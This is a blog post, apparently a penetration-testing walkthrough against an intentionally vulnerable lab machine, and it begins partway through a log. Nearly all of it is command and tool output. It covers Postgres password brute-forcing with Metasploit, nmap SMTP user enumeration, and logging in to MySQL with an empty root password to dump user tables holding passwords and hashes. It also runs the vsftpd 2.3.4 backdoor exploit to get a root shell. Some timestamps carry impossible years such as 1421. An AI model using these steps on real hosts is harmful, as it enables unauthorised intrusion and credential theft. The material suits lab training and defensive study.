[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ”:’tiger’
[-] Remote-IP-Address:5432 Postgres – [09/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [10/21] – Trying username:” with password:’postgres’ on database ‘template1′
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ”:’postgres’
[-] Remote-IP-Address:5432 Postgres – [10/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [11/21] – Trying username:” with password:’password’ on database ‘template1′
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ”:’password’
[-] Remote-IP-Address:5432 Postgres – [11/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [12/21] – Trying username:” with password:’admin’ on database ‘template1′
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ”:’admin’
[-] Remote-IP-Address:5432 Postgres – [12/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [13/21] – Trying username:’scott’ with password:’tiger’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:’tiger’
[-] Remote-IP-Address:5432 Postgres – [13/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [14/21] – Trying username:’scott’ with password:’postgres’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:’postgres’
[-] Remote-IP-Address:5432 Postgres – [14/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [15/21] – Trying username:’scott’ with password:’password’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:’password’
[-] Remote-IP-Address:5432 Postgres – [15/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [16/21] – Trying username:’scott’ with password:’admin’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:’admin’
[-] Remote-IP-Address:5432 Postgres – [16/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [17/21] – Trying username:’admin’ with password:’tiger’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘admin’:’tiger’
[-] Remote-IP-Address:5432 Postgres – [17/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [18/21] – Trying username:’admin’ with password:’postgres’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘admin’:’postgres’
[-] Remote-IP-Address:5432 Postgres – [18/21] – Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >

root@bt:~# psql -h Remote-IP-Address -U postgres -W
Password for user postgres: postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type “help” for help.

postgres=#

———————————————————————————-

port 25 – smtp

root@bt:~# nmap –script smtp-enum-users.nse -p 25,465,587 IP-Address

Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT
Nmap scan report for IP-Address
Host is up (0.00082s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
465/tcp closed smtps
587/tcp closed submission
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

———————————————————————————-

port 3306 - mysql (linux)

root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 –script mysql-empty-password.nse External-IP-Address

Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT
Nmap scan report for External-IP-Address
Host is up (0.00053s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-empty-password:
|_  root account has empty password
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds

root@bt:/usr/local/share/nmap/scripts# mysql –host=External-IP-Address
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> show databases;
+——————–+
| Database           |
+——————–+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+——————–+
7 rows in set (0.01 sec)

mysql> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+—————-+
| Tables_in_dvwa |
+—————-+
| guestbook      |
| users          |
+—————-+
2 rows in set (0.01 sec)

mysql> SELECT * FROM users;
+———+————+———–+———+———————————-+——————————————————+
| user_id | first_name | last_name | user    | password                         | avatar                                               |
+———+————+———–+———+———————————-+——————————————————+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg   |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg    |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg   |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg  |
+———+————+———–+———+———————————-+——————————————————+
5 rows in set (0.00 sec)

mysql>

mysql>

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+——————-+
| Tables_in_owasp10 |
+——————-+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+——————-+
6 rows in set (0.00 sec)

mysql> SELECT * FROM accounts;
+—–+———-+————–+—————————–+———-+
| cid | username | password | mysignature | is_admin |
+—–+———-+————–+—————————–+———-+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+—–+———-+————–+—————————–+———-+
16 rows in set (0.18 sec)

mysql>

———————————————————————————-

port 21 – FTP (linux)

root@bt:~# nmap -sC -sT -v IP-Address

PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

————————————————

msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts IP-Address

msf auxiliary(ftp_version) > run

[*] IP-Address:21 FTP Banner: ‘220 (vsFTPd 2.3.4)\x0d\x0a’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

————————————————

msf auxiliary(ftp_version) > search vsFTPd

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution

————————————————

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > set rhost IP-Address

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling…
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000

ls -l

drwxr-xr-x 2 root root 4096 May 13 1421 bin
drwxr-xr-x 4 root root 1024 May 13 1421 boot
lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev
drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc
drwxr-xr-x 6 root root 4096 Apr 16 1421 home

 

2 thoughts on “port number – exploits

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s